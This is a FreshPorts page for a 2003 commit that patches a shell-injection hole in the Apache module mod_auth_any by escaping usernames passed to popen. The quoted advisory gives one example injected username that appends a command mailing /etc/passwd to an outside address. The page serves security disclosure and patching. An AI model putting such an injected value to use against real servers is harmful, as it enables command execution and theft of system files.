FreshPorts -- The Place For Ports If you buy from Amazon USA, please support us by using this link.
Follow us

I am looking for an LTO tape library. Do you have one to spare?
Commit found by message id
Tue, 25 Mar 2003
[ 04:23:11 lioux ] Original commit 
mod_auth_any www  Deleted Deprecated Expired files touched by this commit Apache module to use any command line program to authenticate a user
o Fix vulnerability that allows execution of arbitrary commands on
  the server with the uid of the apache process. Background [1]:

"The module accepts a username and password from the web client,
passes them to a user-space executable (using popen(3), which invokes
a shell) and waits for a response in order to authenticate the user.
The password is quoted on the popen() command line to avoid
interpretation of shell special chars, but the username is not.
Thus a malicious user can execute commands by supplying an appropriately
crafted username. (e.g. "foo&mail me@my.home</etc/passwd")

"The problem is easily fixed by adding quotes (and escaping any
quotes already present) to the username and password in the popen
command line."

o Fix this by adding a escaping function from [2]. Then, modifying
  this function appropriately with ideas from [3]. Apply the new
  escaping code to mod_auth_any.

Submitted by:   Security Officer (nectar),
                Red Hat Security Response Team <> [1]
Obtained from:  mod_auth_any CVS [2],

Number of ports [& non-ports] in this commit: 1

Showing files for just one port: www/mod_auth_any

show all files

hide all files

3 files found
modify 1.6 View diff View revision /ports/head/www/mod_auth_any/Makefile
import 1.1 View revision /ports/head/www/mod_auth_any/files/bash_single_quote_escape_string.c
import 1.1 View revision /ports/head/www/mod_auth_any/files/patch-mod_auth_any.c
User Login
Create account

Servers and bandwidth provided by
New York Internet, SuperNews, and RootBSD

This site
What is FreshPorts?
About the authors
How big is it?
The latest upgrade!

Enter Keywords:

Latest Vulnerabilities
bugzilla40*Apr 18
bugzilla40*Apr 18
bugzilla42*Apr 18
bugzilla42*Apr 18
bugzilla44*Apr 18
bugzilla44*Apr 18
curlApr 11
dbus-glibApr 11
libaudiofileApr 11
linux-f10-curlApr 11
linux-f10-dbus-glibApr 11
linux-f10-libaudiofileApr 11
linux-f10-nas-libsApr 11
linux-f10-openldapApr 11
mingw32-openssl*Apr 11

13 vulnerabilities affecting 18 ports have been reported in the past 14 days

* - modified, not new

All vulnerabilities

Deleted ports
Sanity Test Failures

NEW Graphs (Javascript)

Calculated hourly:
Port count 24367
Broken 183
Deprecated 90
Ignore 537
Forbidden 6
Restricted 263
No CDROM 108
Vulnerable 29
Expired 8
Set to expire 77
Interactive 22
new 24 hours 2
new 48 hours2
new 7 days15
new fortnight40
new month142

Servers and bandwidth provided by
New York Internet, SuperNews, and RootBSD
Valid HTML, CSS, and RSS.
Copyright © 2000-2014 Dan Langille. All rights reserved.